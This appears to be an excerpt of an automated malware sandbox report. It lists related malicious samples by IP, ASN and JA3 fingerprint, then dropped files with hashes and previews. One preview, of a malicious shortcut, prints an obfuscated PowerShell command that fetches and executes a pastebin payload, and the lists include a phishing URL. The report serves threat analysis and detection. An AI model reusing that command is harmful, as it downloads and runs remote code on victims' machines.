                                                                                                • 104.20.3.235
                                                                                                gaber.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 104.20.4.235
                                                                                                cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 104.20.4.235
                                                                                                steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                                                • 172.67.19.24
                                                                                                cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 172.67.19.24
                                                                                                xc.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                • 172.67.19.24
                                                                                                w0QdNGUNtd.exeGet hashmaliciousRedLineBrowse
                                                                                                • 104.20.3.235

                                                                                                ASNs

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                CLOUDFLARENETUSgaber_pyld.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                                                • 172.67.19.24
                                                                                                cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                                                • 162.159.138.232
                                                                                                OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                                                • 162.159.138.232
                                                                                                BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                • 104.18.111.161
                                                                                                gaber.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 162.159.137.232
                                                                                                cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 162.159.135.232
                                                                                                steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                                                • 162.159.138.232
                                                                                                cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 162.159.138.232
                                                                                                HqvlYZC7Gf.exeGet hashmaliciousUnknownBrowse
                                                                                                • 104.27.206.92
                                                                                                https://e.cukurovadermatoloji.org.tr/i/Do-BbkmS8do2SSRbfKAqhcJT8K9iB0m-Get hashmaliciousUnknownBrowse
                                                                                                • 162.159.134.42
                                                                                                CLOUDFLARENETUSgaber_pyld.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                                                • 172.67.19.24
                                                                                                cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                                                • 162.159.138.232
                                                                                                OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                                                • 162.159.138.232
                                                                                                BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                • 104.18.111.161
                                                                                                gaber.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 162.159.137.232
                                                                                                cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 162.159.135.232
                                                                                                steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                                                • 162.159.138.232
                                                                                                cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 162.159.138.232
                                                                                                HqvlYZC7Gf.exeGet hashmaliciousUnknownBrowse
                                                                                                • 104.27.206.92
                                                                                                https://e.cukurovadermatoloji.org.tr/i/Do-BbkmS8do2SSRbfKAqhcJT8K9iB0m-Get hashmaliciousUnknownBrowse
                                                                                                • 162.159.134.42
                                                                                                FASTLYUScr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                                                • 185.199.111.133
                                                                                                OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                                                • 185.199.109.133
                                                                                                BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                • 185.199.111.133
                                                                                                gaber.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 185.199.108.133
                                                                                                cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 185.199.110.133
                                                                                                steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                                                • 185.199.111.133
                                                                                                cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 185.199.108.133
                                                                                                https://www.google.com.tw/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bkartratraining.%E2%80%8Bco%C2%ADm%2Fcheckout%2Fchart%2Fgy87uy953g6gh8h55hx98uh/d2VzdG9uLmhpbnNvbkBhcmdvZ3JvdXB1cy5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                                                • 151.101.1.229
                                                                                                na.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                • 185.199.109.133
                                                                                                na.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                                • 185.199.108.133
                                                                                                FASTLYUScr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                                                • 185.199.111.133
                                                                                                OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                                                • 185.199.109.133
                                                                                                BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                • 185.199.111.133
                                                                                                gaber.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 185.199.108.133
                                                                                                cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 185.199.110.133
                                                                                                steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                                                • 185.199.111.133
                                                                                                cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 185.199.108.133
                                                                                                https://www.google.com.tw/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bkartratraining.%E2%80%8Bco%C2%ADm%2Fcheckout%2Fchart%2Fgy87uy953g6gh8h55hx98uh/d2VzdG9uLmhpbnNvbkBhcmdvZ3JvdXB1cy5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                                                • 151.101.1.229
                                                                                                na.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                • 185.199.109.133
                                                                                                na.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                                • 185.199.108.133

                                                                                                JA3 Fingerprints

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                3b5074b1b5d032e5620f69f9f700ff0egaber_pyld.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                                                • 104.20.3.235
                                                                                                • 162.159.138.232
                                                                                                • 185.199.110.133
                                                                                                • 185.199.111.133
                                                                                                cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                                                • 104.20.3.235
                                                                                                • 162.159.138.232
                                                                                                • 185.199.110.133
                                                                                                • 185.199.111.133
                                                                                                OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                                                • 104.20.3.235
                                                                                                • 162.159.138.232
                                                                                                • 185.199.110.133
                                                                                                • 185.199.111.133
                                                                                                BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                • 104.20.3.235
                                                                                                • 162.159.138.232
                                                                                                • 185.199.110.133
                                                                                                • 185.199.111.133
                                                                                                gaber.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 104.20.3.235
                                                                                                • 162.159.138.232
                                                                                                • 185.199.110.133
                                                                                                • 185.199.111.133
                                                                                                cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 104.20.3.235
                                                                                                • 162.159.138.232
                                                                                                • 185.199.110.133
                                                                                                • 185.199.111.133
                                                                                                steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                                                • 104.20.3.235
                                                                                                • 162.159.138.232
                                                                                                • 185.199.110.133
                                                                                                • 185.199.111.133
                                                                                                cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 104.20.3.235
                                                                                                • 162.159.138.232
                                                                                                • 185.199.110.133
                                                                                                • 185.199.111.133
                                                                                                https://www.google.com.tw/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bkartratraining.%E2%80%8Bco%C2%ADm%2Fcheckout%2Fchart%2Fgy87uy953g6gh8h55hx98uh/d2VzdG9uLmhpbnNvbkBhcmdvZ3JvdXB1cy5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                                                • 104.20.3.235
                                                                                                • 162.159.138.232
                                                                                                • 185.199.110.133
                                                                                                • 185.199.111.133
                                                                                                na.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                • 104.20.3.235
                                                                                                • 162.159.138.232
                                                                                                • 185.199.110.133
                                                                                                • 185.199.111.133
                                                                                                37f463bf4616ecd445d4a1937da06e19steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                                                • 185.199.111.133
                                                                                                Factura.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                • 185.199.111.133
                                                                                                Prximos VencimientosPDF.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                • 185.199.111.133
                                                                                                dg_official01.exeGet hashmaliciousGuLoaderBrowse
                                                                                                • 185.199.111.133
                                                                                                doc-Impostos.cmdGet hashmaliciousUnknownBrowse
                                                                                                • 185.199.111.133
                                                                                                9evHLnwull.exeGet hashmaliciousVidarBrowse
                                                                                                • 185.199.111.133
                                                                                                Proforma_InvoicePDF.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                • 185.199.111.133
                                                                                                CHHE6LLjWx.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                • 185.199.111.133
                                                                                                Request for Quotation MK FMHS.RFQ.10.24.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                • 185.199.111.133
                                                                                                Request for Quotation MK FMHS.RFQ.10.24.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                • 185.199.111.133

                                                                                                Dropped Files

                                                                                                No context

                                                                                                Created / dropped Files

                                                                                                C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Archive, ctime=Sat May 7 04:20:03 2022, mtime=Mon Sep 9 22:58:05 2024, atime=Sat May 7 04:20:03 2022, length=69632, window=hidenormalshowminimized
                                                                                                Category:dropped
                                                                                                Size (bytes):1728
                                                                                                Entropy (8bit):4.527272298423835
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:8MBsCCbRKrzcAJBkr+/4MsPsiqxlD2uxmCnBuG4aVlilzXQaR3+hab/Ia7/OB+/q:8zD6JUUPx2uxFu+LozXv3KabINBY0
                                                                                                MD5:724AA21828AD912CB466E3B0A79F478B
                                                                                                SHA1:41B80A72CE8C2F1F54C1E595872D7ECD63D637CD
                                                                                                SHA-256:D675147502CF2CA50BC4EC9A0D95DED0A5A8861BEC3D24FCD9EDD3F4B5718E70
                                                                                                SHA-512:B88218356ABF805B4263B0960DC6D0FBEC47E2135FA74839449CA860F727D54A1014062C9E7DB0652E81C635C8C0C177B47326DADAF3AE34ED058FA085F1E98C
                                                                                                Malicious:true
                                                                                                Preview:L..................F.... ...|%h..a.........|%h..a..........................E....P.O. .:i.....+00.../C:\...................V.1......Y..0.Windows.@......T,*)Y................................W.i.n.d.o.w.s.....Z.1.....$Yh...System32..B......T,*)Y......L_.....................!.S.y.s.t.e.m.3.2.....f.2......T.* .forfiles.exe..J......T.*)Y.....A...........t..........t..f.o.r.f.i.l.e.s...e.x.e.......V...............4.......U...........`8......Windows.C:\Windows\System32\forfiles.exe..&.....\.....\.....\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.f.o.r.f.i.l.e.s...e.x.e.../.p. .c.:.\.w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2. ./.m. .n.o.t.e.p.a.d...e.x.e. ./.c. .".p.o.w.e.r.s.h.e.l.l...e.x.e. .-.c.o.m.m.a.n.d. .p.o.w.e.r.s.h.e.l.l. .-.w.i.n.d.o.w.s.t.y.l.e. .h. .-.c.o.m.m.a.n.d. .'.s.a.l. .f.a.t.b.a.k.e. .c.a.l.c.;.s.a.l. .c.a.l.l.i.t. .i.E.x.;. .s.a.l. .$.e.n.v.:.o.s. .i.W.r.;. .c.a.l.l.i.T.(.W.I.N.D.O.W.S._.N.T. .p.a.s.t.e.b.i.n...c.o.m./.r.a.w./.s.A.0.4.M.w.k.2. .-.u.s.e.b.a.s.i.c.p.a.r.s.i.n.g.).'."..

                                                                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Lm9IJ4r9oO.exe_92129a1d551236141b3f431f937c53d9105e43d3_343b24ea_e8b94a10-6638-4ae8-9fc5-3f240e2421d9\Report.wer

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):65536
                                                                                                Entropy (8bit):1.0022354517476522
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:BiHeFnNashhqBoI7R+6tQXIDcQvc6QcE2cw3MO+HbHg/8BRTf3nF1zWOy4lOY+mg:DVNanQ0BU84/jDhhGSuiFlH4IO8q
                                                                                                MD5:B07C9FEA8300A2BBC62320B43840870B
                                                                                                SHA1:55183B2934657E735EEA27FB1C33A9A53A118F3C
                                                                                                SHA-256:2C91D6C16AC1133C06001D25F2CCDDCAF6367E28F3E86F7F2C980E31BE8B3ECF
                                                                                                SHA-512:FA01CBB005ADAB0F17BCDA4247C23FA4861011A3DDE650AA730F3DD7588DE59C0C48F48A91F0CE5B80F7D705ADA941ED27AAF792CAE88214BE51883AAB485AE2
                                                                                                Malicious:true
                                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.4.7.4.0.5.2.5.1.4.7.3.2.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.3.4.7.4.0.5.3.3.8.9.7.3.9.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.8.b.9.4.a.1.0.-.6.6.3.8.-.4.a.e.8.-.9.f.c.5.-.3.f.2.4.0.e.2.4.2.1.d.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.1.1.7.b.6.c.6.-.5.3.6.c.-.4.a.e.d.-.a.3.2.a.-.3.c.5.2.0.6.8.2.a.3.8.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.L.m.9.I.J.4.r.9.o.O...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.f.c.-.0.0.0.1.-.0.0.1.5.-.f.8.a.9.-.3.4.b.3.0.9.1.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.9.3.a.4.1.e.2.a.b.1.b.e.6.7.4.f.1.6.8.c.0.c.3.7.a.0.e.7.a.a.6.0.0.0.0.f.f.f.f.!.0.0.0.0.c.5.1.7.b.f.5.6.9.3.4.7.5.9.9.f.e.8.4.8.c.3.f.c.9.3.8.1.f.6.d.a.f.3.f.9.e.c.7.1.!.L.m.9.I.J.4.r.9.o.O...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.

                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERC3FF.tmp.dmp

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                File Type:Mini DuMP crash report, 14 streams, Tue Oct 15 13:54:13 2024, 0x1205a4 type
                                                                                                Category:dropped
                                                                                                Size (bytes):119243
                                                                                                Entropy (8bit):1.8652519017129456
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:d8rD0lRxoZJ20CEM3Rhw8OXzYI/LRkJw0ytfS1k+tp:dC0lRxoZo0CEGRhBOXLUw0efSb3
                                                                                                MD5:181632455AA6FFFFE5A37503AB788FD0
                                                                                                SHA1:2C6691F899821A3F5D5D5724B968CC94FAD0523A
                                                                                                SHA-256:14BD01903B691820D686C0AAE7A534329CD71CC454A60E3BE36386F6E8603B5C
                                                                                                SHA-512:4C10364347F6B4B7E0D856BDA71685064C8C8E1F0E734757B26C96C430556B9A1063AC6AC3851BDFEBD7BE9720EDF8B55915584400018A01DC01B0143FA8C32D
                                                                                                Malicious:false
                                                                                                Preview:MDMP..a..... ........t.g.........................................K..........T.......8...........T............K..............,!...........#..............................................................................eJ.......#......GenuineIntel............T............s.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERC6B0.tmp.WERInternalMetadata.xml

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8410
                                                                                                Entropy (8bit):3.699792930887906
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:R6l79RJNO6Rre6YwbSU9LDgmfi7Alpr089bSOuFsfNGm:R6lXJk6U6Y8SU9vgmfi7AZSOuef1
                                                                                                MD5:41B9A9077B199F04C2CEC31BB7B35B67
                                                                                                SHA1:FB8B8C7355D6469652696D76A3E48C4CB7084EBE
                                                                                                SHA-256:6E449E90F8F55D3D15090E4D38667C26617E113CF618170E25C0AAB6D4F535CE
                                                                                                SHA-512:359D60F439F7B9990AE5A59A5DD151EC071B7E4E8E2E5E8A66F4B67014D7882075E409804C424D2FA594E2454203E0854B510616EA78CA7B7ED637B0F88E2951
                                                                                                Malicious:false
                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...3.4.4.8...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.3.4.4.8.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.7.6.<./.P.i.

                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERC6D0.tmp.xml

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):4723
                                                                                                Entropy (8bit):4.48953873450756
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:cvIwr7SGl8zsTJgkZ7aI9XkWpW8VYXPYm8M4JqOsFEZRV+q8vPO2hNfd:uIafth7197VLJzVKZhNfd
                                                                                                MD5:E6DCD5BACE01BDC5C548AF55C1BABA60
                                                                                                SHA1:165CC33CD343E09EF6985A650B8B2F7A4E3C5871
                                                                                                SHA-256:322C69BF4CB756B7364F579C99F062EEC5701B6C11868C43C2E6449DC6D3C146
                                                                                                SHA-512:E3EE78797757F8D65AFF28F37BEB1CFF0F37BD4591862C70B722AC992868E8F9E138E9C7B58894F948EF7F3DC24A8E186C35BF68A412BC2602DE6C39DEBC7724
                                                                                                Malicious:false
                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="3448" />.. <arg nm="verqfe" val="3448" />.. <arg nm="csdbld" val="3448" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="222888406" />.. <arg nm="osinsty" val="2" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="

                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):11608
                                                                                                Entropy (8bit):4.890472898059848
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:x9smG3YrKkj9dcU6C7Vsm5emlV9smbib4xYTVsm5emdqxoeRgp51ib47VFn3eGOq:lF/ib4xYT33ib47VoGIpN6KQkj2gikjm
                                                                                                MD5:6608B9ECBDD36DEA311D11883E5888C7
                                                                                                SHA1:A3787DEEAFEB575AE2CCD6F0FB71E0FBA1069B28
                                                                                                SHA-256:B1FC6F92D3360FD6416226BA40D224A14FE11396D7127399FDB3097450255E36
                                                                                                SHA-512:DECCE44C46CF29072E0CE1801AEA53F23617FE74A0395AE285DFB600CE542985350EFE5B3ACC19FE3B26904BB85374437675A567BFCA95651DEB7437A81E910E
                                                                                                Malicious:false
                                                                                                Preview:PSMODULECACHE......&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope........-Z..z..a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider........p...z..[...C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package...

                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):11436
                                                                                                Entropy (8bit):5.443043860337226
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:hndjsPwvGXjZh12XtGnjw9ya3RYSMjc2fPUOX9JP4li5CtkElwqR8C2OXQ91z9Uj:hdjsPwvGzwgj6H38AKP4gakElx2+Q9gj
                                                                                                MD5:4B84393ED22FEB212728518EBCF74EB9
                                                                                                SHA1:7A0AFE4532A5653A800FB44BB8E8BFF0FA00CE5C
                                                                                                SHA-256:1B35FA333905C74501AEF520578FB5F2AC5D45ABF95EA1640CD8AEEE25EF9A5D
                                                                                                SHA-512:C9D129C9D345400A38545BA614A49B5E0455835EF737B5DDD0AFB9C32641D44DCEEF386BE706409B780583F2A28407A6744331D470D8620012B2AB23DB576E94
                                                                                                Malicious:false
                                                                                                Preview:@...e...........B....................................@..........H...............o..b~.D.poM...!..... .Microsoft.PowerShell.ConsoleHostD...............E...y.BG.\..............System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.4.................%...K... ...f.......System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.............................................V.@..?@...@.X.@.J.@.Z.@.^.@.qT@.kT@..T@..S@.......@.].@.\.@...@...@...@...@...@...@.=.@.?.@...@...@.

                                                                                                C:\Users\user\AppData\Local\Temp\RESBF7B.tmp

                                                                                                Download File
                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Tue Oct 15 15:03:39 2024, 1st section name ".debug$S"
                                                                                                Category:dropped
                                                                                                Size (bytes):1328
                                                                                                Entropy (8bit):3.9865224133287556
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:Hoe9E2gOX8XhHIwKE2mfII+ycuZhNXakSJPNnqSqd:UOX8x3K1mg1ulXa3rqSK
                                                                                                MD5:5FEBC21DB9A5D6133E8C0A9EBC8EDA78
                                                                                                SHA1:D992F9E109178D68D1B52981828F3F40D8AC0C2E
                                                                                                SHA-256:11DC58A8CA1CE3E20F48A0D325A965F3C864009EC860ABDD5623D1662FB3124B
                                                                                                SHA-512:D83B835E29B3A7E6090AD03765C6661F2F93EF6E74733A76CA13DEB133A2D9F9A826E8EF45A33606E80B6E510592853F72A69E46E30DA606AB26AAB00609D2C3
                                                                                                Malicious:false
                                                                                                Preview:L...K..g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\ztufso2n\CSC92EFC5D82192472686D16339634A9CDA.TMP...................\2t*..6.z..h..........4.......C:\Users\user\AppData\Local\Temp\RESBF7B.tmp.-.<....................a..Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...z.t.u.f.s.o.2.n...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2eo5l5ci.40o.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3orf51hj.cxc.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
